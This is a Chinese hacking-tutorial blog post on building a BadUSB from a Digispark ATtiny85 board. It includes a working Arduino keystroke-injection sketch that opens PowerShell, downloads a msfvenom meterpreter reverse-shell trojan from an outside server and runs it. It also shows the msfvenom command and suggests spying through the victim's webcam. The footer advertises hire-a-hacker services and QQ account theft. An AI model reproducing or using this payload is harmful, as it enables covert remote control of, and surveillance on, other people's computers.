黑客意志

别捡个u盘就往电脑上插,小心被开摄像头!

团队:Admin Team

作者:小屁孩

这段时间看美剧黑客军团,里面在停车场扔 Badusb 钓鱼的镜头,看的我着实震惊啊,不得不感叹大佬就是大佬。然后就在某宝上买了块板子来学习一下。

这个东西很多大佬都已经玩过的,学习下,记录下学习的过程,大佬勿喷。

(图片来自网络)

0x00 前期准备

arduino 的 IDE 开发环境 arduino-1.6.5-r5

Digispark 的驱动 Digispark

Digispark kickstarter 开发板 Attiny85微型 USB接口

(文末附链接。)

0x01开始踩坑

1.加载 Digispark 的板子,打开 Arduino 选择文件 > 首选项 >

2.在下图位置加上如下 URL ,加载其他的开发板。digistump.com/package_d

3.选择工具 > 板 > Boards Manager

4.等待下图的进度条完成,然后在上方右侧的框中输入Di 看到 Digistump 这个,点击安装,等待安装完成。(很慢……)

5.安装完成以后重新选择工具 > 板,就可以看见刚才安装好的,点击选择。

6.解压 Digispark 文件安装驱动,64位安装 DPinst.exe 32位安装 DPinst.exe。

(无脑安装点击就行了。)

7.准备好了,我们就可以来写代码,烧录第一个 Badusb 了。嗯,没啥好说的。就先给各位大表哥弹个计算机(计算器)吧。

代码写完可以先点击左上角的 √ 检查是否有错误。

确认无误后点击上传,等待下方出现 Plug in device now … ,然后插入板子

显示如下就代表成功了!

演示视频:

https://www.zhihu.com/video/1169034989151973376

示例代码:

#include "DigiKeyboard.h" 
void setup(){
DigiKeyboard.delay(500); //延迟0.5秒
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT); //按下 win+r 键
DigiKeyboard.delay(500);
DigiKeyboard.print("cmd"); //输入cmd 
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER); //按下回车键
DigiKeyboard.delay(500);
DigiKeyboard.print("calc");  
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop(){ 
}

各位大表哥一定觉得弹个计算器有啥好玩的?但是既然都弹计算器了,啥不能干啊。下面给大家表演个好玩的,结合 kali 的 msf 下载远程木马文件,并执行,渗透一波 win10 。

0x03 渗透win10

目标机: win10 ip: 10.**.86.83

攻击机: kali ip: 10.**.179.179

1.启动 kali 的 msfconsole 生成木马文件。

msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>system.exe

然后把马儿传到外网可以访问的服务器网站目录下。

然后设置监听 ip ,端口,run 起来。

关键点在于怎么让 badusb 插上以后下载木马文件。

这里我们用到 windows 的powershell 下载文件的命令。

操作如下:

在 windows 运行 win+r 输入 powershell

在弹出的 shell 中输入

$client = new-object System.Net.WebClient

$client.DownloadFile(‘http://**.**.**.**/system.exe’ ,’D:system.exe’)

我们就可以成功的下载文件。

只要把这段代码改造成类似刚才弹计算器的代码烧录到 badusb 中就Ok 了。代码如下:

#include "DigiKeyboard.h" 
void setup() { 
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);  // 按下 win+r
DigiKeyboard.delay(500); 
DigiKeyboard.sendKeyStroke(KEY_ENTER); // 按下回车
DigiKeyboard.delay(500); 
DigiKeyboard.print("powershell"); //输入 powershell
DigiKeyboard.delay(500); 
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500); 
DigiKeyboard.println("$client = new-object System.Net.WebClient");  // 下载木马文件
DigiKeyboard.delay(500); 
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000); 
DigiKeyboard.println("$client.DownloadFile('http://**.**.**.**/system.exe' ,'D:\system.exe')");
DigiKeyboard.delay(1000); 
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500); 
DigiKeyboard.println("D:\system.exe"); //执行木马文件
DigiKeyboard.println("exit"); //退出 powershell
DigiKeyboard.delay(500); 
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500); 
DigiKeyboard.println("exit"); //退出  cmd
DigiKeyboard.sendKeyStroke(KEY_ENTER);
} 
void loop() 
{  }

看一下效果。

演示视频:

https://www.zhihu.com/video/1169031313289453568

视频中第一次点击,为选择 usb 接入主机还是 kali 虚拟机。

可以看到在代码执行完成以后,msf 直接拿到权限。(火绒已关。)

权限都拿了,开个摄像头看看

附:Digispark kickstarter 开发板 Attiny85微型 USB接口

某宝链接:m.tb.cn/h.eLHXk6w

附:arduino-1.6.5-r5 和 Digispark 的驱动

百度网盘链接: pan.baidu.com/s/1geRjFa

提取码: mh6w

扫码关注公众号

赞(0)
分享到: 更多 (0)

黑客技术,黑客教程,黑客软件,黑客入门,黑客工具,黑客平台,黑客下单,渗透测试,CTF,菠菜,源码,暗网,安卓,物联网安全,网络安全周,国家安全,企业安全,盗QQ号,正规黑客,接单黑客,SRC测试,黑客修改,黑客交流,黑客追款,APP渗透,黑客系统

联系我们联系我们